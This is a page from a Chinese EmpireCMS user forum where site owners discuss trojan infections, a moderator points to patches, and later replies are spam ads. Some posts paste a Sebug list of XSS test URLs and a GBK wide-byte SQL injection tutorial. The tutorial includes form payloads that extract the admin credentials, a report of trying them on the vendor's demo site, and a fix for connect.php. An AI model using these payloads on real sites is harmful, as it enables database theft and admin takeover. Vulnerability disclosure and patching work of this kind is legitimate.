帝国论坛帝国网站管理系统交流区帝国CMS使用交流最近我的帝国站很多都被挂木马了。 【本版专题贴子】  
 4/4    |‹ ‹‹ 2 3 4
主题:最近我的帝国站很多都被挂木马了。 [加入收藏夹]   

winbaidu
用户头衔:秀才

精华贴   :0
发贴数   :120
经验值   :501
注册时间:2008-11-22
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 31 楼]

不是ARP 别的网站和服务器都正常。只是帝国的网站一放上就会被 加代码。 现在只能把帝国程序只为只读。他现在才加不了。

现在只网站为只读不是解决的最好办法。



深圳网站建设 www.xjmw.net
2010-06-23 16:52:18 已设置保密 顶部 回复 引用 报告 编辑 删除

sanhunren2002
用户头衔:秀才

精华贴   :0
发贴数   :108
经验值   :537
注册时间:2009-11-23
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 32 楼]

这个问题最近困扰我无数了夜晚,强烈顶起此帖,使官方重视



东莞seo服务http://www.seo668.com东莞网站优化
欧式家具http://www.xingudian.com新古典家具
2010-06-23 16:57:46 已设置保密 顶部 回复 引用 报告 编辑 删除

sanhunren2002
用户头衔:秀才

精华贴   :0
发贴数   :108
经验值   :537
注册时间:2009-11-23
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 33 楼]

大家看看相关的文章:http://www.baidu.com/s?wd=%B5%DB%B9%FA6.0%C2%A9%B6%B4&rsp=1&oq=%B5%DB%B9%FA%20%C2%A9%B6%B4&f=1&tn=max2_cb

影响版本:
帝国(EmpireCMS)6.0
漏洞描述:
帝国软件是一家专注于网络软件开发的科技公司,其主营产品“帝国网站管理系统(EmpireCMS)”是目前国内应用最广泛的CMS程序。通过多年的不断创新与完善,使系统集安全、强大、稳定、灵活于一身。

目前EmpireCMS程序已经广泛应用在国内数十万家网站,覆跟内上千万上网人群,并经过上千家知名网站的严格检测,被称为国内最稳定的CMS系统。

/search/keyword/index.php 存在多个跨站漏洞
<*参考
s1@sebug.net
http://sebug.net/vulndb/19733/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://ssvdb.com/search/keyword/index.php?show=3">[xss]
http://ssvdb.com/search/keyword/index.php?classid=3">[xss]
http://ssvdb.com/search/keyword/index.php?tbname=3">[xss]
http://ssvdb.com/search/keyword/index.php?tempid=3">[xss]
http://ssvdb.com/search/keyword/index.php?starttime=3">[xss]
http://ssvdb.com/search/keyword/index.php?endtime=3">[xss]
http://ssvdb.com/search/keyword/index.php?startprice=3">[xss]
http://ssvdb.com/search/keyword/index.php?endprice=3">[xss]
http://ssvdb.com/search/keyword/index.php?orderby=3">[xss]
http://ssvdb.com/search/keyword/index.php?myorder=3">[xss]
http://ssvdb.com/search/keyword/index.php?keyboard=3">[xss]
http://ssvdb.com/search/keyword/index.php?allsame=3">[xss]
SEBUG安全建议:
厂商补丁:

phome.net


文章来源:http://www.anqn.com/loudong/kuazhan/2010-06-04/a09127329.shtml



东莞seo服务http://www.seo668.com东莞网站优化
欧式家具http://www.xingudian.com新古典家具
2010-06-23 17:56:55 已设置保密 顶部 回复 引用 报告 编辑 删除

zeedy
用户头衔:版主

精华贴   :0
发贴数   :2288
经验值   :7394
注册时间:2007-05-29
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 34 楼]

帝国CMS6.0目前没有发现安全问题。请检查服务器安全配置

至于楼上说的
这个严格来讲并不是漏洞,谁会自己在网址里加html代码来攻击自己?只是钓鱼者可能发链接给网友让他点,没其他用途。
这个对网站安全没有任何影响,当然新版也已经修正了

[该贴被修改 1 次,最后修改时间 2010-06-23 18:00:54 ]



2010-06-23 18:00:27 已设置保密 顶部 回复 引用 报告 编辑 删除

sanhunren2002
用户头衔:秀才

精华贴   :0
发贴数   :108
经验值   :537
注册时间:2009-11-23
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 35 楼]

还有:
大家都知道PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(')会被转义成\'。比如字符%bf在满足上述条件的情况下会变成%bf\'。其中反斜杠(\)的十六进制编码是%5C,单引号(')的十六进制编码是%27,那么就可以得出%bf \'=%bf%5c%27。如果程序的默认字符集是GBK等宽字节字符集,则MySQL会认为%bf%5c是一个宽字符,也就是“縗”。也就是说%bf \'=%bf%5c%27=縗'。%bf并不是唯一的一个字符,应该是%81-%FE之间的任意一个都可以。不太好理解,我们用小葵写的一个字符转换的小工具来转换一下。
说到这里好像还没有看出来到底有什么用。了解PHP+MySQL注入的朋友应该都明白,单引号在注入里绝对是个好东西。尤其是,很多程序员都过分依赖于magic_quotes_gpc或者addslashes、 iconv等函数的转义。理论上说,只要数据库连接代码设置了GBK编码,或者是默认编码就是GBK,那现在的程序里到处都是注入漏洞。事实上,这种变换在 XSS等领域也发挥了巨大的作用,在PHP+Linux后台程序结合的时候,还可能造成命令注入,也就是说能可以在注入点直接执行Linux系统命令。比如登录文件login.php的代码如下:
$conn=mysql_connect("localhost","root","hackest");

mysql_query("SET NAMES 'GBK'");

mysql_select_db("test",$conn);


$user=mysql_escape_string($_GET['user']);



$pass=mysql_escape_string($_GET['pass']);



$sql="select * from cms_user where username='$user' and password='$pass'";

$result=mysql_query($sql,$conn);

while ($row=mysql_fetch_array($result, MYSQL_ASSOC)) { cneduit.com

$rows[]=$row;

}




?>

则可以通过构造以下语句进行注入:


http://www.hackest.cn/login.php?user=%df'%20or%201=1%20limit%201,1%23&pass=



%20 是空格的URL编码,%23是#的URL编码,Mysql注释符之一。对应的SQL语句是:

select * from cms_user where username='运'or 1=1 limit 1,1#' and password="

---------------------------------------------------------------------------------------




二、实践 内容

/*理论准备得差不多了,该来点实际的了,这次就拿帝国CMS做例子吧。帝国CMS是号称最安全、最稳定的开源 CMS(内容管理系统)。帝国CMS的留言本文件部分代码如下:



//权限


if($gbr['groupid'])



{

include("../../class/user.php");

$user=islogin();

include("../../class/MemberLevel.php");



if($level_r[$gbr[groupid]][level]>$level_r[$user[groupid]][level])

{


echo" ";



exit();

} cop

}

esetcookie("gbookbid",$bid,0);

$bname=$gbr['bname'];

$search="&bid=$bid";

$page=(int)$_GET['page'];

$start=(int)$_GET['start'];

$line=12; //每页显示条数

cneduit.com

$page_line=12;//每页显示链接数

$offset=$start+$page*$line;//总偏移量

$totalnum=(int)$_GET['totalnum'];

if($totalnum)



{ cneduit.com

$num=$totalnum;




}

{

$totalquery="select count(*) as total from {$dbtbpre}enewsgbook where bid='$bid' and checked=0";

copyright cneduit


$num=$empire->gettotal($totalquery);//取得总条数

}

$search.="&totalnum=$num";

$query="select lyid,name,email,`call`,lytime,lytext,retext from {$dbtbpre}enewsgbook where bid='$bid' and checked=0";//hackest注解:关键是这一句,与上面举例的何其相似啊!

$query=$query." order by lyid desc limit $offset,$line";

cneduit.com

$sql=$empire->query($query);

$listpage=page1($num,$line,$page_line,$start,$page,$search);

$url="".$fun_r['index']." > ".$fun_r['saygbook'];

?>*/

注意注释部分!就直接拿官方测试吧,我就不本机折腾了。官方演示站点:http://demo.phome.net/,还别说,界面倒是蛮清爽的,难怪这么多站长用咯。直奔留言本页面:http://demo.phome.net/e/tool/gbook/?bid=1,注意要带上bid=1(我下载了套最新版的帝国CMS,e/tool/gbook目录下就一个index.php文件,直接访问它会有错误提示,并跳转至前一个页面)。然后下拉至“请您留言:”处,按如下要求填写相关信息:

姓名:123縗\

联系邮箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

联系电话:随便写

留言内容:随便写



东莞seo服务http://www.seo668.com东莞网站优化
欧式家具http://www.xingudian.com新古典家具
2010-06-23 18:04:25 已设置保密 顶部 回复 引用 报告 编辑 删除

zeedy
用户头衔:版主

精华贴   :0
发贴数   :2288
经验值   :7394
注册时间:2007-05-29
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 36 楼]

楼上这个看发布区“帝国CMS重要更新 【20090613】”补丁:http://bbs.phome.net/showthread-23-98862-0.html

影响5.1以下版本




2010-06-23 18:06:06 已设置保密 顶部 回复 引用 报告 编辑 删除

sanhunren2002
用户头衔:秀才

精华贴   :0
发贴数   :108
经验值   :537
注册时间:2009-11-23
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 37 楼]

wm_chief就是开发帝国CMS的程序员。因为提交了好几遍,在后台又删不掉,所以有多条记录。破解出来密码明文就可以登录后台了,不过官方演示站点后台并没有数据库操作权限,凡是涉及到数据库的操作就会提示:




在线演示仅开放观看权限,与数据库相关操作已被管理员禁止!



如果您的浏览器没有自动跳转,请点击这里

而且这个MD5是在线查询查不出来的,明文是用MD5的彩虹表破解出来的,后面会附图。这个后台就是只能让你看看,顺便体验一下其强大的功能(官方也提供的演示管理员用户名和密码均为 admin,也可以登录,不过都是操作不了的),拿这个密码去社工一下管理员,也没有什么意外的收获,其博客、论坛、邮箱、官方站点FTP、官方站点 3389等均无法进入,所以官方是搞不到Webshell了。

希望使用帝国CMS6.0的朋友注意这个漏洞,下面有解决方法:



由于PHP本身对GBK宽字节特殊汉字处理存在问题,致使帝国系统受迁连。此问题目前已经影响到 帝国CMS 中的部分功能模块的使用,恶意用户可能通过部分功能对网站发起攻击。为此我们强烈建议您立即进行修补。

帝国CMS于 2009-06-13 13:40修正了最新程序,此时间后从官方下载并安装和升级的用户(v5.1)将不用修复此补丁。




修 复方法:(适用于所有帝国CMS版本)



修改e/class/connect.php文件,找到:

/*function db_connect(){




global $phome_db_server,$phome_db_username,$phome_db_password,$phome_db_dbname,$phome_db_port,$phome_db_char,$phome_use_dbver;




$dblocalhost=$phome_db_server;

//端口




if($phome_db_port)

{




$dblocalhost.=":".$phome_db_port;

}



$link=@mysql_connect($dblocalhost,$phome_db_username,$phome_db_password);




if(!$link)




{



echo"Cann't connect to DB!";




exit();




}

//编码

if($phome_use_dbver>='4.1')

{



if($phome_db_char)




{




@mysql_query("SET names '".$phome_db_char."';");



}

if($phome_use_dbver>='5.0')



{



@mysql_query("SET sql_mode=''");




}

}

@mysql_select_db($phome_db_dbname);

return $link;



}*/



/*function db_connect(){




global $phome_db_server,$phome_db_username,$phome_db_password,$phome_db_dbname,$phome_db_port,$phome_db_char,$phome_use_dbver;




$dblocalhost=$phome_db_server;

//端口

if($phome_db_port)




{ cneduit.com

$dblocalhost.=":".$phome_db_port;



}




$link=@mysql_connect($dblocalhost,$phome_db_username,$phome_db_password);

if(!$link)




{




echo"Cann't connect to DB!";

exit();




}

//编码

if($phome_use_dbver>='4.1')

{

$q='';



if($phome_db_char)



{




$q='character_set_connection='.$phome_db_char.',character_set_results='.$phome_db_char.',character_set_client=binary';

}


if($phome_use_dbver>='5.0')




{

$q.=(empty($q)?'':',').'sql_mode=\'\'';

}

{



@mysql_query('SET '.$q);

}



}


@mysql_select_db($phome_db_dbname);

return $link;


}

, 然后保存文件即可修复完毕。 it学习资讯网

(推荐用dreamweaver编辑,可防止UTF8编码文件被转换为GBK)



东莞seo服务http://www.seo668.com东莞网站优化
欧式家具http://www.xingudian.com新古典家具
2010-06-23 18:07:13 已设置保密 顶部 回复 引用 报告 编辑 删除

zeedy
用户头衔:版主

精华贴   :0
发贴数   :2288
经验值   :7394
注册时间:2007-05-29
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 38 楼]

帝国所有版本补丁专贴:http://bbs.phome.net/showthread-13-136488-0.html
从2002年发布以来共有四个补丁。




2010-06-23 18:07:27 已设置保密 顶部 回复 引用 报告 编辑 删除

wangxi0668
用户头衔:探花

精华贴   :0
发贴数   :1901
经验值   :6811
注册时间:2009-05-24
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 39 楼]

专业查杀帝国版本漏洞木马,清理木马,升级版本。联系QQ:52440488



QQ:52440488 http://www.918hezu.com www.fjjxc.com
www.189288.com www.gz-bestally.com www.oemfy.com www.xcdnpx.com www.dewlis.com www.oemdg.com www.oemgc.com www.xcwxpx.com www.023gree.com www.ystdzkj.com
http://www.189286.com www.oemdg.com
2018-10-08 09:33:48 已设置保密 顶部 回复 引用 报告 编辑 删除

wangxi0668
用户头衔:探花

精华贴   :0
发贴数   :1901
经验值   :6811
注册时间:2009-05-24
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 40 楼]

专业查杀帝国版本漏洞木马,清理木马,升级版本。联系QQ:52440488



QQ:52440488 http://www.918hezu.com www.fjjxc.com
www.189288.com www.gz-bestally.com www.oemfy.com www.xcdnpx.com www.dewlis.com www.oemdg.com www.oemgc.com www.xcwxpx.com www.023gree.com www.ystdzkj.com
http://www.189286.com www.oemdg.com
2018-10-08 09:34:56 已设置保密 顶部 回复 引用 报告 编辑 删除
 4/4    |‹ ‹‹ 2 3 4

快速回复
内容

表情
使用EBB代码 使用smile代码 显示签名 自动分析url 自动分析img
     【进入高级模式】   (按 Ctrl+Enter 直接提交)
    顶部  加入收藏夹
关于帝国 | 广告服务 | 联系我们 | 法律声明 | 隐私条款 | 许可协议
Powered by: EBB Version 2.2.1